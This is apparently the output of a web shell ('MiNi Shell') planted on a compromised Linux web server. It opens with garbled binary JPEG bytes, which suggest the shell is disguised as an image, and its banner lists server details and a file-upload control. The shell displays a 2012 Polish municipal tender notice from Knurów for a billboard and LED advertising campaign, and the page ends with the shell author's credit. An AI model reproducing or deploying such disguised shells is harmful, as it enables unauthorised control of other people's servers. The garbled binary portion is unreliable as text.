JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120306/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120306/68070-N-2012.html

<p class="kh_header"><b>Knurów: Przeprowadzenie kampanii outdoorowej na potrzeby promocji terenów inwestycyjnych Gminy Knurów w ramach projektu: Knurów zawsze po drodze. Atrakcyjne tereny inwestycyjne pomiędzy autostradami A1 i A4</b><br>
<b>Numer ogłoszenia: 68070 - 2012; data zamieszczenia: 06.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Knurów , ul. dr. Floriana Ogana 5, 44-190 Knurów, woj. śląskie, tel. 32 3392308, faks 32 2351521, 3392292.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.knurow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie kampanii outdoorowej na potrzeby promocji terenów inwestycyjnych Gminy Knurów w ramach projektu: Knurów zawsze po drodze. Atrakcyjne tereny inwestycyjne pomiędzy autostradami A1 i A4.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje przeprowadzenie kampanii outdoorowej na potrzeby promocji terenów inwestycyjnych Gminy Knurów w ramach projektu: Knurów - zawsze po drodze. Atrakcyjne tereny inwestycyjne pomiędzy autostradami A1 i A4 w ramach RPO WSL 2007-2013 na nośnikach reklamy zewnętrznej, z wykorzystaniem elementów graficznych oraz hasła kampanii promocyjnej terenów inwestycyjnych zawartych w Księdze Znaku. W ramach realizacji przedmiotu zamówienia wykonawca zobowiązany będzie do:
 1.1.przeprowadzenia kampanii billboardowej na rzecz zamawiającego poprzez:
 a)wynajem/udostępnienie nośników reklamowych typu billboard w ilości 7 sztuk w roku 2012 oraz 7 sztuk w roku 2013 o poniższych parametrach:
powierzchnia reklamowa nie mniejsza niż 11,00 m2,
ekspozycja na trwałej metalowej konstrukcji wiszącej lub opartej na słupie/nogach,
minimalna wysokość umieszczenia 2 m licząc od poziomu gruntu do dolnej krawędzi tablicy billboardowej,
ustawienie prostopadłe lub równoległe do drogi,
lokalizacja tablic billboardowych w następujących miejscach:
rejon węzła autostradowego Sośnica - 1 punkt,
rejon zjazdów i wjazdów na autostradę A1 lub A4 - 1 punkt we Wrocławiu, 1 punkt w Katowicach, 1 punkt w Krakowie, 1 punkt na terenie Aglomeracji Górnośląskiej,
rejon drogi ekspresowej S1 - 1 punt,
teren międzynarodowego portu lotniczego lub droga dojazdowa do międzynarodowego portu lotniczego - 1 punkt.
Za wyjątkiem lokalizacji umieszczonej bezpośrednio na terenie międzynarodowego portu lotniczego, wszystkie pozostałe billboardy powinny występować co najmniej przy drogach krajowych, w odległości nie większej niż w promieniu do 5 km od docelowej lokalizacji (tj. drogi S1 oraz autostrady A1 lub A4 bądź węzłów zjazdowych/wjazdowych w/w autostrad.
 b)zaprojektowanie plakatu wielkoformatowego do umieszczenia na billboardach, o których mowa wyżej /1 na cały okres trwania kampanii/, o wizerunku bezpośrednio odwołującym się do promocji terenów inwestycyjnych Gminy Knurów. Projekt musi zawierać obowiązkowy zestaw logo i hasła kampanii promocyjnej ujętej w Księdze Znaku oraz uwzględniać Wytyczne Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007-2013 dla beneficjentów w zakresie informacji i promocji, które dostępne są na stronie internetowej www.rpo.silesia-region.pl,
 c)wydruk oraz wyklejenie plakatów wielkoformatowych na papierze o gramaturze nie niższej niż 115gr/m2 i nie wyższej niż 150 gr/m2 oraz nie innym niż blueback lub greyback, w formacie odpowiadającym formatowi tablic billboardowych, w ilości zapewniającej stałą ekspozycję na zamawianych nośnikach oraz dodatkowo na 2 billboardach stanowiących własność zamawiającego i usytuowanych na terenie Gminy Knurów, które wykonawca winien uwzględnić kalkulując koszty związane z wydrukiem i wyklejaniem odpowiedniej ilości plakatów. Billboardy stanowiące własność zamawiającego zostaną udostępnione wykonawcy bezpłatnie na potrzeby prowadzenia kampanii outdoorowej przez cały okres realizacji umowy,
 d)rozpoczęcie kampanii outdoorowej na billboardach  w terminie do 1 miesiąca licząc od dnia podpisania umowy oraz zakończenia realizacji kampanii do 30 listopada 2013 roku,
 e)zapewnienie 3-miesięcznej nieprzerwanej ekspozycji plakatów na billboardach w każdym z 7 punktów lokalizacyjnych w każdym roku, z zachowaniem zasady, iż w każdym miesiącu kampanii ekspozycji podlegać będzie minimum 1 plakat:
1 punkt x 3 miesiące/rok,
2 punkt x 3 miesiące/rok,
3 punkt x 3 miesiące/rok,
4 punkt x 3 miesiące/rok,
5 punkt x 3 miesiące/rok,
6 punkt x 3 miesiące/rok,
7 punkt x 3 miesiące/rok,
Razem: 21 miesięcy ekspozycji na billboardach w roku 2012 w 7 punktach lokalizacyjnych i 21 miesięcy ekspozycji na billboardach w roku 2013 w 7 punktach lokalizacyjnych.
Ogółem: 42 miesiące ekspozycji plakatów na billboardach w latach 2012 - 2013,
 f)kontrolę jakości umieszczania plakatów na billboardach, konserwacji ekspozycji oraz wszelkich czynności niezbędnych do utrzymania wysokiego poziomu ekspozycji w ciągu trwania kampanii outdoorowej,
 g)usunięcie plakatów z billboardów po zakończeniu okresu ekspozycji lub zapewnienia trwałego ich zasłonięcia innymi plakatami,
 1.2. przeprowadzenia kampanii outdoorowej za pomocą nośników podświetlanych /ekranów LED/ na rzecz zamawiającego poprzez: 
 a)wynajem/udostępnienie nośników podświetlanych /ekrany LED/ o minimalnej powierzchni ekranu 9 m2, w ilości 6 sztuk w roku 2012 oraz 6 sztuk w roku 2013, w następujących lokalizacjach:
Aglomeracja Górnośląska - 2 punkty, 
Wrocław - 2 punkty, 
Kraków - 2 punkty, 
każdorazowo o dużym natężeniu ruchu komunikacyjnego: samochodowego, kolejowego bądź lotniczego,
 b)opracowanie scenariusza spotu reklamowego /1 na cały okres kampanii/ o tematyce bezpośrednio odwołującej się do promocji terenów inwestycyjnych Gminy Knurów. Projekt spotu musi zawierać obowiązkowy zestaw logo i hasła kampanii promocyjnej ujętej w Księdze Znaku oraz uwzględniać Wytyczne Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007-2013 dla beneficjentów w zakresie informacji i promocji, które dostępne są na stronie internetowej www.rpo.silesia-region.pl, 
 c)umieszczenie i emisję na nośnikach podświetlanych /ekranach LED/ spotów reklamowych o długości minimum 10 sekund i w częstotliwości wyświetlania co 5-6 minut, w dniach roboczych od poniedziałku do piątku, w godzinach pomiędzy 9.00 a 19.00, 
 d)rozpoczęcie kampanii outdoorowej na nośnikach podświetlanych /ekranach LED/ w terminie do 1 miesiąca licząc od dnia podpisania umowy oraz zakończenia realizacji kampanii do 30 listopada 2013 roku,
 e)zapewnienie w każdym z 6 punktów lokalizacyjnych, w każdym roku, nie mniej niż 400 odsłon spotu w wybranym przez siebie 1 miesiącu, z zachowaniem zasady, iż w każdym kwartale kampanii przynajmniej w 1 punkcie lokalizacyjnym zostanie wyemitowanych minimum 400 odsłon spotu:
1 punkt x 400 odsłon w 1 miesiącu/rok,
2 punkt x 400 odsłon w 1 miesiącu/rok,
3 punkt x 400 odsłon w 1 miesiącu/rok,
4 punkt x 400 odsłon w 1 miesiącu/rok,
5 punkt x 400 odsłon w 1 miesiącu/rok,
6 punkt x 400 odsłon w 1 miesiącu/rok,
Uwaga: dzienny limit emisji spotu nie może być mniejszy niż 20 odsłon.
Razem: 2400 emisji w roku 2012 w 6 punktach lokalizacyjnych na nośnikach podświetlanych /ekranach LED/ i 2400 emisji w roku 2013 w 6 punktach lokalizacyjnych na nośnikach podświetlanych /ekranach LED/.
Ogółem: 4800 emisji spotów w latach 2012-2013.
 1.3.sporządzania elektronicznego raportu kontrolującego proces wyklejania plakatów oraz emisji spotów, który powinien przedstawiać zdjęcie danego nośnika wraz z wyklejonym plakatem lub emitowanym spotem wraz z podaniem szczegółowej lokalizacji /miasto i nazwa ulicy/ oraz datą sporządzenia zdjęcia i przesłania takiego raportu e-mailem na adres zamawiającego: bwz@knurow.pl,
 1.4.sporządzania na podstawie elektronicznych raportów kontrolujących, kwartalnych sprawozdań z realizacji przedmiotu zamówienia, które powinny zawierać wykaz nośników wykorzystywanych na potrzeby kampanii w danym miesiącu, łączny okres ekspozycji plakatu bądź emisji spotu przypadający na dany nośnik lokalizacji oraz krótki opis planowanych działań na następny okres sprawozdawczy z ewentualnymi uwagami. Sprawozdania w formie pisemnej, podpisane przez osobę wyznaczoną przez wykonawcę do realizacji przedmiotu umowy, przesyłane będą na adres zamawiającego, na koniec każdego kwartału. 
 2.Szczegółowy zakres usług określa wzór/projekt umowy stanowiący załącznik do SIWZ.
3. Zadanie, będące przedmiotem niniejszego postępowania o wartości szacunkowej zamówienia wynoszącej 119.830,00 zł. (netto), w przeliczeniu na euro 29.811,42, stanowi część zamówienia publicznego udzielanego w częściach na usługi w zakresie przeprowadzenia kampanii promocyjnej w ramach projektu: Knurów - zawsze po drodze. Atrakcyjne tereny inwestycyjne pomiędzy autostradami A1 i A4 o łącznej wartości szacunkowej zamówienia wynoszącej 304.836,73 zł. (netto), co w przeliczeniu na euro stanowi 75.837,58 euro.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.34.14.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający wymaga wykazania się, w wykazie usług, wykonaniem w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowa­dzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługi polegającej na: przygotowaniu i przeprowadzeniu kampanii outdoorowej na nośnikach typu billboard za kwotę o wartości minimum 30 tys zł. brutto, lub przygotowaniu i przeprowadzeniu kampanii outdoorowej na nośnikach podświetlanych /ekranach LED/ za kwotę o wartości minimum 36 tys zł. brutto, 
Zamawiający oceni spełnienie powyższego warunku na podstawie przedsta­wionych przez Wykonawcę oświadczeń i dokumentów, na zasadzie spełnia - nie spełnia.
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami (wiedzą i do­świadczeniem) niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisem­ne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów (wiedzy i doświadczenia) na okres korzystania z nich przy wykonywaniu zamó­wienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">wstępne harmonogramy kampanii outdoorowej dla billboardów w roku 2012 i w roku 2013 oraz dla nośników podświetlanych /ekranów LED/ w roku 2012 i w roku 2013 na formularz stanowiących załącznik do Formularza ofertowego lub w oparciu o druk tegoż formularza, zachowując jego układ i treść</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca polegający na wiedzy i doświadczeniu innych podmiotów przedstawia w oryginale pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę istotnych postanowień umowy zawartej w wyniku niniejszego postępowania w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w przypadkach wskazanych w wzorze/projekcie umowy stanowiącym załącznik do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.knurow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek wykonawcy w siedzibie zamawiającego - Wydział Zamówień Publicznych, pok. 218, w godz. 8:00 - 13:30 lub za zalicz. pocztowym po uiszczeniu opłaty w wys. 9,00 zł na konto zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.03.2012 godzina 10:00, miejsce: Urząd Miasta Knurów, ul. dr. F. Ogana 5, 44-190 Knurów, Wydział Zamówień Publicznych, pok. 218, II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie współfinansowane do 85 % z Europejskiego Funduszu Rozwoju Regionalnego w ramach RPO Województwa Śląskiego na lata 2007-2013, priorytet: I Badania i rozwój technologiczny, innowacje i przedsiębiorczość, poddziałanie 1.1.2. promocja inwestycyjna. Osobami uprawnionymi do porozumiewania się z wykonawcami są: 1)Naczelnik Wydziału Zamówień Publicznych - Grażyna Szweda, tel. 32 339-23-08, 2)Z-ca Naczelnika Wydziału Zamówień Publicznych - Kornelia Loch, tel. 32 339-23-10, fax 32 441-97-44, 32 339-22-92, e-mail: zp.@knurow.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com